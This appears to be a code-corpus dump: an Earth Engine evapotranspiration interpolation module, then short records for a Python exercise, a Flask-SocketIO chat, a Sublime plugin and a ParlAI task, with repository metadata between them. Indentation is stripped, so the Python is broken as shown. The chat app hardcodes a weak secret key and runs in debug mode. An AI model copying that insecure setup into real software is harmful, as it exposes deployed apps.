start_date : str
ISO format start date.
end_date : str
ISO format end date (exclusive, passed directly to .filterDate()).
variables : list
List of variables that will be returned in the Image Collection.
interp_args : dict
Parameters from the INTERPOLATE section of the INI file.
# TODO: Look into a better format for showing the options
interp_method : {'linear}, optional
Interpolation method. The default is 'linear'.
interp_days : int, str, optional
Number of extra days before the start date and after the end date
to include in the interpolation calculation. The default is 32.
model_args : dict
Parameters from the MODEL section of the INI file. The reference
source and parameters will need to be set here if computing
reference ET or actual ET.
t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
Time interval over which to interpolate and aggregate values
The default is 'custom' which means the aggregation time period
will be controlled by the start and end date parameters.
use_joins : bool, optional
If True, use joins to link the target and source collections.
If False, the source collection will be filtered for each target image.
This parameter is passed through to interpolate.daily().
Returns
-------
ee.ImageCollection
Raises
------
ValueError
Notes
-----
This function currently assumes that "mask" and "time" bands already exist
in the scene collection.
"""
# Get interp_method
if 'interp_method' in interp_args.keys():
interp_method = interp_args['interp_method']
else:
interp_method = 'linear'
logging.debug('interp_method was not set, default to "linear"')
# Get interp_days
if 'interp_days' in interp_args.keys():
interp_days = interp_args['interp_days']
else:
interp_days = 32
logging.debug('interp_days was not set, default to 32')
# Check that the input parameters are valid
if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
raise ValueError('unsupported t_interval: {}'.format(t_interval))
elif interp_method.lower() not in ['linear']:
raise ValueError('unsupported interp_method: {}'.format(
interp_method))
if ((type(interp_days) is str or type(interp_days) is float) and
utils.is_number(interp_days)):
interp_days = int(interp_days)
elif not type(interp_days) is int:
raise TypeError('interp_days must be an integer')
elif interp_days <= 0:
raise ValueError('interp_days must be a positive integer')
if not variables:
raise ValueError('variables parameter must be set')
# Adjust start/end dates based on t_interval
# Increase the date range to fully include the time interval
start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
if t_interval.lower() == 'annual':
start_dt = datetime.datetime(start_dt.year, 1, 1)
# Covert end date to inclusive, flatten to beginning of year,
# then add a year which will make it exclusive
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, 1, 1)
end_dt += relativedelta(years=+1)
elif t_interval.lower() == 'monthly':
start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
end_dt += relativedelta(months=+1)
start_date = start_dt.strftime('%Y-%m-%d')
end_date = end_dt.strftime('%Y-%m-%d')
# The start/end date for the interpolation include more days
# (+/- interp_days) than are included in the ETr collection
interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
interp_start_date = interp_start_dt.date().isoformat()
interp_end_date = interp_end_dt.date().isoformat()
# Get reference ET source
if 'et_reference_source' in model_args.keys():
et_reference_source = model_args['et_reference_source']
else:
raise ValueError('et_reference_source was not set')
# Get reference ET band name
if 'et_reference_band' in model_args.keys():
et_reference_band = model_args['et_reference_band']
else:
raise ValueError('et_reference_band was not set')
# Get reference ET factor
if 'et_reference_factor' in model_args.keys():
et_reference_factor = model_args['et_reference_factor']
else:
et_reference_factor = 1.0
logging.debug('et_reference_factor was not set, default to 1.0')
# raise ValueError('et_reference_factor was not set')
# CGM - Resampling is not working correctly so commenting out for now
# # Get reference ET resample
# if 'et_reference_resample' in model_args.keys():
# et_reference_resample = model_args['et_reference_resample']
# else:
# et_reference_resample = 'nearest'
# logging.debug(
# 'et_reference_resample was not set, default to nearest')
# # raise ValueError('et_reference_resample was not set')
if type(et_reference_source) is str:
# Assume a string source is an single image collection ID
# not an list of collection IDs or ee.ImageCollection
daily_et_ref_coll = ee.ImageCollection(et_reference_source) \
.filterDate(start_date, end_date) \
.select([et_reference_band], ['et_reference'])
# elif isinstance(et_reference_source, computedobject.ComputedObject):
# # Interpret computed objects as image collections
# daily_et_reference_coll = et_reference_source \
# .filterDate(self.start_date, self.end_date) \
# .select([et_reference_band])
else:
raise ValueError('unsupported et_reference_source: {}'.format(
et_reference_source))
# Scale reference ET images (if necessary)
# CGM - Resampling is not working correctly so not including for now
if (et_reference_factor and et_reference_factor != 1):
def et_reference_adjust(input_img):
return input_img.multiply(et_reference_factor) \
.copyProperties(input_img) \
.set({'system:time_start': input_img.get('system:time_start')})
daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
# Initialize variable list to only variables that can be interpolated
interp_vars = ['et_fraction', 'ndvi']
interp_vars = list(set(interp_vars) & set(variables))
# To return ET, the ETf must be interpolated
if 'et' in variables and 'et_fraction' not in interp_vars:
interp_vars.append('et_fraction')
# With the current interpolate.daily() function,
# something has to be interpolated in order to return et_reference
if 'et_reference' in variables and 'et_fraction' not in interp_vars:
interp_vars.append('et_fraction')
# The time band is always needed for interpolation
interp_vars.append('time')
# TODO: Look into implementing et_fraction clamping here
# (similar to et_actual below)
# Filter scene collection to the interpolation range
# This probably isn't needed since scene_coll was built to this range
scene_coll = scene_coll.filterDate(interp_start_date, interp_end_date)
# For count, compute the composite/mosaic image for the mask band only
if 'count' in variables:
aggregate_coll = aggregate_to_daily(
image_coll = scene_coll.select(['mask']),
start_date=start_date, end_date=end_date)
# The following is needed because the aggregate collection can be
# empty if there are no scenes in the target date range but there
# are scenes in the interpolation date range.
# Without this the count image will not be built but the other
# bands will be which causes a non-homogeneous image collection.
aggregate_coll = aggregate_coll.merge(
ee.Image.constant(0).rename(['mask'])
.set({'system:time_start': ee.Date(start_date).millis()}))
# Interpolate to a daily time step
daily_coll = daily(
target_coll=daily_et_ref_coll,
source_coll=scene_coll.select(interp_vars),
interp_method=interp_method, interp_days=interp_days,
use_joins=use_joins,
compute_product=False,
)
# The interpolate.daily() function can/will return the product of
# the source and target image named as "{source_band}_1".
# The problem with this approach is that is will drop any other bands
# that are being interpolated (such as the ndvi).
# daily_coll = daily_coll.select(['et_fraction_1'], ['et'])
# Compute ET from ETf and ETr (if necessary)
# This isn't needed if compute_product=True in daily() and band is renamed
# The check for et_fraction is needed since it is back computed from ET and ETr
# if 'et' in variables or 'et_fraction' in variables:
def compute_et(img):
"""This function assumes ETr and ETf are present"""
et_img = img.select(['et_fraction']) \
.multiply(img.select(['et_reference']))
return img.addBands(et_img.double().rename('et'))
daily_coll = daily_coll.map(compute_et)
def aggregate_image(agg_start_date, agg_end_date, date_format):
"""Aggregate the daily images within the target date range
Parameters
----------
agg_start_date: ee.Date, str
Start date (inclusive).
agg_end_date : ee.Date, str
End date (exclusive).
date_format : str
Date format for system:index (uses EE JODA format).
Returns
-------
ee.Image
Notes
-----
Since this function takes multiple inputs it is being called
for each time interval by separate mappable functions
"""
if 'et' in variables or 'et_fraction' in variables:
et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
.select(['et']).sum()
if 'et_reference' in variables or 'et_fraction' in variables:
# et_reference_img = daily_coll \
et_reference_img = daily_et_ref_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['et_reference']).sum()
image_list = []
if 'et' in variables:
image_list.append(et_img.float())
if 'et_reference' in variables:
image_list.append(et_reference_img.float())
if 'et_fraction' in variables:
# Compute average et fraction over the aggregation period
image_list.append(
et_img.divide(et_reference_img).rename(
['et_fraction']).float())
if 'ndvi' in variables:
# Compute average ndvi over the aggregation period
ndvi_img = daily_coll \
.filterDate(agg_start_date, agg_end_date) \
.mean().select(['ndvi']).float()
image_list.append(ndvi_img)
if 'count' in variables:
count_img = aggregate_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['mask']).sum().rename('count').uint8()
image_list.append(count_img)
return ee.Image(image_list) \
.set({
'system:index': ee.Date(agg_start_date).format(date_format),
'system:time_start': ee.Date(agg_start_date).millis()})
# .set(interp_properties) \
# Combine input, interpolated, and derived values
if t_interval.lower() == 'daily':
def agg_daily(daily_img):
# CGM - Double check that this time_start is a 0 UTC time.
# It should be since it is coming from the interpolate source
# collection, but what if source is GRIDMET (+6 UTC)?
agg_start_date = ee.Date(daily_img.get('system:time_start'))
# CGM - This calls .sum() on collections with only one image
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
date_format='YYYYMMdd')
return ee.ImageCollection(daily_coll.map(agg_daily))
elif t_interval.lower() == 'monthly':
def month_gen(iter_start_dt, iter_end_dt):
iter_dt = iter_start_dt
# Conditional is "less than" because end date is exclusive
while iter_dt < iter_end_dt:
yield iter_dt.strftime('%Y-%m-%d')
iter_dt += relativedelta(months=+1)
month_list = ee.List(list(month_gen(start_dt, end_dt)))
def agg_monthly(agg_start_date):
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
date_format='YYYYMM')
return ee.ImageCollection(month_list.map(agg_monthly))
elif t_interval.lower() == 'annual':
def year_gen(iter_start_dt, iter_end_dt):
iter_dt = iter_start_dt
while iter_dt < iter_end_dt:
yield iter_dt.strftime('%Y-%m-%d')
iter_dt += relativedelta(years=+1)
year_list = ee.List(list(year_gen(start_dt, end_dt)))
def agg_annual(agg_start_date):
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
date_format='YYYY')
return ee.ImageCollection(year_list.map(agg_annual))
elif t_interval.lower() == 'custom':
# Returning an ImageCollection to be consistent
return ee.ImageCollection(aggregate_image(
agg_start_date=start_date, agg_end_date=end_date,
date_format='YYYYMMdd'))
def from_scene_et_actual(scene_coll, start_date, end_date, variables,
interp_args, model_args, t_interval='custom',
use_joins=False,
):
"""Interpolate from a precomputed collection of Landsat actual ET scenes
Parameters
----------
scene_coll : ee.ImageCollection
Non-daily 'et' images that will be interpolated.
start_date : str
ISO format start date.
end_date : str
ISO format end date (exclusive, passed directly to .filterDate()).
variables : list
List of variables that will be returned in the Image Collection.
interp_args : dict
Parameters from the INTERPOLATE section of the INI file.
# TODO: Look into a better format for showing the options
interp_source : str
interp_band : str
interp_resample : {'nearest', 'nearest'}
interp_method : {'linear}, optional
Interpolation method. The default is 'linear'.
interp_days : int, str, optional
Number of extra days before the start date and after the end date
to include in the interpolation calculation. The default is 32.
et_fraction_min : float
et_fraction_max : float
model_args : dict
Parameters from the MODEL section of the INI file. The reference
source and other parameters will need to be set here if computing
reference ET or ET fraction.
t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
Time interval over which to interpolate and aggregate values
The default is 'custom' which means the aggregation time period
will be controlled by the start and end date parameters.
use_joins : bool, optional
If True, use joins to link the target and source collections.
If False, the source collection will be filtered for each target image.
This parameter is passed through to interpolate.daily().
# TODO: Move these into interp_args (and/or model_args)
fraction_min : float, optional
fraction_max : float, optional
Returns
-------
ee.ImageCollection
Raises
------
ValueError
Notes
-----
This function currently assumes that "mask" and "time" bands already exist
in the scene collection.
"""
# Get interp_method
if 'interp_method' in interp_args.keys():
interp_method = interp_args['interp_method']
else:
interp_method = 'linear'
logging.debug('interp_method was not set, default to "linear"')
# Get interp_days
if 'interp_days' in interp_args.keys():
interp_days = interp_args['interp_days']
else:
interp_days = 32
logging.debug('interp_days was not set, default to 32')
# Check that the input parameters are valid
if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
raise ValueError('unsupported t_interval: {}'.format(t_interval))
elif interp_method.lower() not in ['linear']:
raise ValueError('unsupported interp_method: {}'.format(
interp_method))
if ((type(interp_days) is str or type(interp_days) is float) and
utils.is_number(interp_days)):
interp_days = int(interp_days)
elif not type(interp_days) is int:
raise TypeError('interp_days must be an integer')
elif interp_days <= 0:
raise ValueError('interp_days must be a positive integer')
if not variables:
raise ValueError('variables parameter must be set')
# Adjust start/end dates based on t_interval
# Increase the date range to fully include the time interval
start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
if t_interval.lower() == 'annual':
start_dt = datetime.datetime(start_dt.year, 1, 1)
# Covert end date to inclusive, flatten to beginning of year,
# then add a year which will make it exclusive
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, 1, 1)
end_dt += relativedelta(years=+1)
elif t_interval.lower() == 'monthly':
start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
end_dt += relativedelta(months=+1)
start_date = start_dt.strftime('%Y-%m-%d')
end_date = end_dt.strftime('%Y-%m-%d')
# The start/end date for the interpolation include more days
# (+/- interp_days) than are included in the ETr collection
interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
interp_start_date = interp_start_dt.date().isoformat()
interp_end_date = interp_end_dt.date().isoformat()
# Get reference ET collection
if 'et_reference' in variables or 'et_fraction' in variables:
if 'et_reference_source' not in model_args.keys():
raise ValueError('et_reference_source was not set')
if 'et_reference_band' not in model_args.keys():
raise ValueError('et_reference_band was not set')
# TODO: Check if model_args can be modified instead of making new variables
if 'et_reference_factor' in model_args.keys():
et_reference_factor = model_args['et_reference_factor']
else:
et_reference_factor = 1.0
logging.debug('et_reference_factor was not set, default to 1.0')
# raise ValueError('et_reference_factor was not set')
# CGM - Resampling is not working correctly so commenting out for now
# if 'et_reference_resample' in model_args.keys():
# et_reference_resample = model_args['et_reference_resample']
# else:
# et_reference_resample = 'nearest'
# logging.debug(
# 'et_reference_resample was not set, default to nearest')
# # raise ValueError('et_reference_resample was not set')
# Assume a string source is an single image collection ID
# not an list of collection IDs or ee.ImageCollection
daily_et_ref_coll_id = model_args['et_reference_source']
daily_et_ref_coll = ee.ImageCollection(daily_et_ref_coll_id) \
.filterDate(start_date, end_date) \
.select([model_args['et_reference_band']], ['et_reference'])
# Scale reference ET images (if necessary)
# CGM - Resampling is not working correctly so not including for now
if (et_reference_factor and et_reference_factor != 1):
def et_reference_adjust(input_img):
return input_img.multiply(et_reference_factor) \
.copyProperties(input_img) \
.set({'system:time_start': input_img.get('system:time_start')})
daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
# TODO: Add code to fall back on the model_args reference ET parameters
# if the interp source/band/resample parameters are not set.
# Get the interpolation collection
if 'interp_source' not in interp_args.keys():
raise ValueError('interp_source was not set')
if 'interp_band' not in interp_args.keys():
raise ValueError('interp_band was not set')
# CGM - Resampling is not working correctly so commenting out for now
# if 'interp_resample' not in interp_args.keys():
# interp_args['interp_resample'] = 'nearest'
# logging.debug('interp_resample was not set, defaulting to nearest')
# # raise ValueError('interp_resample was not set')
# CGM - Factor is not currently being applied so commenting out for now
# if 'interp_factor' not in interp_args.keys():
# interp_args['interp_factor'] = 1.0
# logging.debug('interp_factor was not set, defaulting to 1.0')
# # raise ValueError('interp_factor was not set')
# Target collection needs to be filtered to the same date range as the
# scene collection in order to normalize the scenes.
# It will be filtered again to the start/end when it is sent into
# interpolate.daily()
daily_target_coll = ee.ImageCollection(interp_args['interp_source']) \
.filterDate(interp_start_date, interp_end_date) \
.select([interp_args['interp_band']])
interp_vars = ['et'] + ['mask', 'time']
# For count, compute the composite/mosaic image for the mask band only
if 'count' in variables:
aggregate_coll = aggregate_to_daily(
image_coll=scene_coll.select(['mask']),
start_date=start_date, end_date=end_date)
# The following is needed because the aggregate collection can be
# empty if there are no scenes in the target date range but there
# are scenes in the interpolation date range.
# Without this the count image will not be built but the other
# bands will be which causes a non-homogeneous image collection.
aggregate_coll = aggregate_coll.merge(
ee.Image.constant(0).rename(['mask'])
.set({'system:time_start': ee.Date(start_date).millis()}))
# It might be more efficient to join the target collection to the scenes
def normalize_et(img):
img_date = ee.Date(img.get('system:time_start')) \
.update(hour=0, minute=0, second=0)
img_date = ee.Date(img_date.millis().divide(1000).floor().multiply(1000))
target_img = ee.Image(daily_target_coll \
.filterDate(img_date, img_date.advance(1, 'day')).first())
# CGM - This is causing weird artifacts in the output images
# if interp_args['interp_resample'].lower() in ['bilinear', 'bicubic']:
# target_img = target_img.resample(interp_args['interp_resample'])
et_norm_img = img.select(['et']).divide(target_img).rename(['et_norm'])
# Clamp the normalized ET image (et_fraction)
if 'et_fraction_max' in interp_args.keys():
et_norm_img = et_norm_img.min(float(interp_args['et_fraction_max']))
if 'et_fraction_min' in interp_args.keys():
et_norm_img = et_norm_img.max(float(interp_args['et_fraction_min']))
# if ('et_fraction_min' in interp_args.keys() and
# 'et_fraction_max' in interp_args.keys()):
# et_norm_img = et_norm_img.clamp(
# float(interp_args['et_fraction_min']),
# float(interp_args['et_fraction_max']))
return img.addBands([
et_norm_img.double(), target_img.rename(['norm'])])
# The time band is always needed for interpolation
scene_coll = scene_coll \
.filterDate(interp_start_date, interp_end_date) \
.select(interp_vars) \
.map(normalize_et)
# # Join the target (normalization) image to the scene images
# if use_joins:
# prev_filter = ee.Filter.And(
# ee.Filter.maxDifference(
# difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
# leftField='system:time_start', rightField='system:time_start'),
# ee.Filter.greaterThan(leftField='system:time_start',
# rightField='system:time_start')
# )
# scene_coll = ee.ImageCollection(
# ee.Join.saveFirst(matchKey='norm_img', ordering='system:time_start',
# ascending=False)
# .apply(primary=scene_coll, secondary=target_coll,
# condition=prev_filter)
# )
# Interpolate to a daily time step
daily_coll = daily(
target_coll=daily_target_coll.filterDate(start_date, end_date),
source_coll=scene_coll.select(['et_norm', 'time']),
interp_method=interp_method, interp_days=interp_days,
use_joins=use_joins,
compute_product=True,
)
# The interpolate.daily() function is currently returning the product of
# the source and target image named as "{source_band}_1".
# This approach will not be valid if other bands are interpolated.
daily_coll = daily_coll.select(['et_norm_1'], ['et'])
# Convert normalized ET back to ET
# This isn't needed if compute_product=True in daily() and band is renamed
# The check for et_fraction is needed since it is back computed from ET and ETr
# # if 'et' in variables or 'et_fraction' in variables:
# def compute_et(img):
# """This function assumes ETr and ETf are present"""
# et_img = img.select(['et_norm']).multiply(
# img.select(['et_reference']))
# return img.addBands(et_img.double().rename('et'))
# daily_coll = daily_coll.map(compute_et)
def aggregate_image(agg_start_date, agg_end_date, date_format):
"""Aggregate the daily images within the target date range
Parameters
----------
agg_start_date: ee.Date, str
Start date (inclusive).
agg_end_date : ee.Date, str
End date (exclusive).
date_format : str
Date format for system:index (uses EE JODA format).
Returns
-------
ee.Image
Notes
-----
Since this function takes multiple inputs it is being called
for each time interval by separate mappable functions
"""
if 'et' in variables or 'et_fraction' in variables:
et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
.select(['et']).sum()
if 'et_reference' in variables or 'et_fraction' in variables:
# Get the reference ET image from the reference ET collection,
# not the interpolated collection
# et_reference_img = daily_coll.select(['et_reference']) \
et_reference_img = daily_et_ref_coll \
.filterDate(agg_start_date, agg_end_date) \
.sum()
image_list = []
if 'et' in variables:
image_list.append(et_img.float())
if 'et_reference' in variables:
image_list.append(et_reference_img.float())
if 'et_fraction' in variables:
# Compute average et fraction over the aggregation period
image_list.append(
et_img.divide(et_reference_img)
.rename(['et_fraction']).float())
# if 'ndvi' in variables:
# # Compute average ndvi over the aggregation period
# ndvi_img = daily_coll \
# .filterDate(agg_start_date, agg_end_date) \
# .mean().select(['ndvi']).float()
# image_list.append(ndvi_img)
if 'count' in variables:
count_img = aggregate_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['mask']).sum().rename('count').uint8()
image_list.append(count_img)
return ee.Image(image_list) \
.set({
'system:index': ee.Date(agg_start_date).format(date_format),
'system:time_start': ee.Date(agg_start_date).millis()})
# .set(interp_properties)\
# Combine input, interpolated, and derived values
if t_interval.lower() == 'daily':
def agg_daily(daily_img):
# CGM - Double check that this time_start is a 0 UTC time.
# It should be since it is coming from the interpolate source
# collection, but what if source is GRIDMET (+6 UTC)?
agg_start_date = ee.Date(daily_img.get('system:time_start'))
# CGM - This calls .sum() on collections with only one image
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
date_format='YYYYMMdd')
return ee.ImageCollection(daily_coll.map(agg_daily))
elif t_interval.lower() == 'monthly':
def month_gen(iter_start_dt, iter_end_dt):
iter_dt = iter_start_dt
# Conditional is "less than" because end date is exclusive
while iter_dt < iter_end_dt:
yield iter_dt.strftime('%Y-%m-%d')
iter_dt += relativedelta(months=+1)
month_list = ee.List(list(month_gen(start_dt, end_dt)))
def agg_monthly(agg_start_date):
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
date_format='YYYYMM')
return ee.ImageCollection(month_list.map(agg_monthly))
elif t_interval.lower() == 'annual':
def year_gen(iter_start_dt, iter_end_dt):
iter_dt = iter_start_dt
while iter_dt < iter_end_dt:
yield iter_dt.strftime('%Y-%m-%d')
iter_dt += relativedelta(years=+1)
year_list = ee.List(list(year_gen(start_dt, end_dt)))
def agg_annual(agg_start_date):
return aggregate_image(
agg_start_date=agg_start_date,
agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
date_format='YYYY')
return ee.ImageCollection(year_list.map(agg_annual))
elif t_interval.lower() == 'custom':
# Returning an ImageCollection to be consistent
return ee.ImageCollection(aggregate_image(
agg_start_date=start_date, agg_end_date=end_date,
date_format='YYYYMMdd'))
# @deprecated
# def aggregate_daily_with_joins(image_coll, start_date, end_date,
# agg_type='mean'):
# """Aggregate images by day (using joins)
#
# The primary purpose of this function is to join separate Landsat images
# from the same path into a single daily image.
#
# Parameters
# ----------
# image_coll : ee.ImageCollection
# Input image collection.
# start_date : date, number, string
# Start date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# end_date : date, number, string
# End date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# agg_type : {'mean'}, optional
# Aggregation type (the default is 'mean').
# Currently only a 'mean' aggregation type is supported.
#
# Returns
# -------
# ee.ImageCollection()
#
# Notes
# -----
# This function should be used to mosaic Landsat images from same path
# but different rows.
# system:time_start of returned images will be 0 UTC (not the image time).
#
# """
# # Build a collection of time "features" to join to
# # "Flatten" dates to 0 UTC time
# if start_date and end_date:
# date_list = ee.List.sequence(
# ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# 24 * 3600 * 1000)
# # elif start_date:
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # end_date = ee.Date.fromYMD(end_date.get('year'), end_date.get('month'),
# # # end_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), end_date.millis(), 24 * 3600 * 1000)
# # elif end_date:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # start_date = ee.Date.fromYMD(
# # # start_date.get('year'), start_date.get('month'),
# # # start_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # start_date.millis(), ee.Date(end_date).millis(), 24 * 3600 * 1000)
# # else:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# # 24 * 3600 * 1000)
#
# def set_date(time):
# return ee.Feature(None, {
# 'system:index': ee.Date(time).format('yyyyMMdd'),
# 'system:time_start': ee.Number(time).int64(),
# 'date': ee.Date(time).format('yyyy-MM-dd')})
#
# # Add a date property to the image collection
# def set_image_date(img):
# return ee.Image(img.set({
# 'date': ee.Date(img.get('system:time_start')).format('yyyy-MM-dd')}))
#
# join_coll = ee.FeatureCollection(
# ee.Join.saveAll('join').apply(
# ee.FeatureCollection(date_list.map(set_date)),
# ee.ImageCollection(image_coll.map(set_image_date)),
# ee.Filter.equals(leftField='date', rightField='date')))
#
# def aggregate_func(ftr):
# # The composite image time will be 0 UTC (not Landsat time)
# agg_coll = ee.ImageCollection.fromImages(ftr.get('join'))
#
# # if agg_type.lower() == 'mean':
# agg_img = agg_coll.mean()
# # elif agg_type.lower() == 'median':
# # agg_img = agg_coll.median()
#
# return agg_img.set({
# 'system:index': ftr.get('system:index'),
# 'system:time_start': ftr.get('system:time_start'),
# 'date': ftr.get('date'),
# })
#
# return ee.ImageCollection(join_coll.map(aggregate_func))
| 5,374 | 0 | 443 |
d647d9fc435832b4a77f277be087b6f1b5bcaf8b | 118 | py | Python | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | a = 15 * 3
b = 15 / 3
c = 15 // 2
d = 15 ** 2
print(type(a), a)
print(type(b), b)
print(type(c), b)
print(type(d), d)
| 13.111111 | 17 | 0.508475 | a = 15 * 3
b = 15 / 3
c = 15 // 2
d = 15 ** 2
print(type(a), a)
print(type(b), b)
print(type(c), b)
print(type(d), d)
| 0 | 0 | 0 |
57c553a9a739ecbb0b4fd2427d2bac62b228e5ff | 599 | py | Python | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | #! /usr/bin/python
# -*- encoding: utf-8 -*-
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__, template_folder='templates', static_url_path='/static/', static_folder='static')
app.config['SECRET_KEY'] = 'ines'
socketio = SocketIO(app)
@app.route('/')
@socketio.on('connected')
@socketio.on('client_message')
if __name__ == '__main__':
socketio.run(app, debug=True)
| 23.96 | 102 | 0.722871 | #! /usr/bin/python
# -*- encoding: utf-8 -*-
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__, template_folder='templates', static_url_path='/static/', static_folder='static')
app.config['SECRET_KEY'] = 'ines'
socketio = SocketIO(app)
@app.route('/')
def index():
return render_template('./index.html')
@socketio.on('connected')
def conn(msg):
return {'data':'Ok'}
@socketio.on('client_message')
def receive_message(data):
emit('server_message', data, broadcast=True)
if __name__ == '__main__':
socketio.run(app, debug=True)
| 97 | 0 | 66 |
b27d9d10ebfcf46ce082cb1400705ed810b5c508 | 1,309 | py | Python | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | from .constant import TEXT_DELIMITER
from .settings import get_setting
from typing import Any, Dict, Optional
import sublime
| 35.378378 | 111 | 0.674561 | from .constant import TEXT_DELIMITER
from .settings import get_setting
from typing import Any, Dict, Optional
import sublime
def prepare_fanhuaji_convert_args(view: sublime.View, args: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
_args: Dict[str, Any] = get_setting("convert_params")
# 轉換模組
if "modules" in _args and isinstance(_args["modules"], dict):
_args["modules"] = sublime.encode_value(_args["modules"])
# 轉換前取代
if "userPreReplace" in _args and isinstance(_args["userPreReplace"], dict):
_args["userPreReplace"] = "\n".join(f"{old}={new}" for old, new in _args["userPreReplace"].items())
# 轉換後取代
if "userPostReplace" in _args and isinstance(_args["userPostReplace"], dict):
_args["userPostReplace"] = "\n".join(f"{old}={new}" for old, new in _args["userPostReplace"].items())
# 保護字詞
if "userProtectReplace" in _args and isinstance(_args["userProtectReplace"], list):
_args["userProtectReplace"] = "\n".join(_args["userProtectReplace"])
# 參數: API 全域
_args["apiKey"] = get_setting("api_key")
_args["prettify"] = False
# 參數: API convert 端點
_args["text"] = TEXT_DELIMITER.join(view.substr(region) for region in view.sel())
_args["diffEnable"] = False
_args.update(args or {})
return _args
| 1,216 | 0 | 23 |
a3f069b53d411bc2f04b599eaa7ce34537700ad7 | 1,762 | py | Python | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 258 | 2020-04-10T07:01:06.000Z | 2022-03-26T11:49:30.000Z | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 33 | 2020-04-10T04:28:51.000Z | 2022-03-31T02:52:02.000Z | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 43 | 2020-04-14T10:43:33.000Z | 2022-03-13T02:27:54.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDialogTeacher
from parlai.core.agents import MultiTaskTeacher
from .build import build
import copy
import os
# By default train on all tasks at once.
| 27.107692 | 79 | 0.628831 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
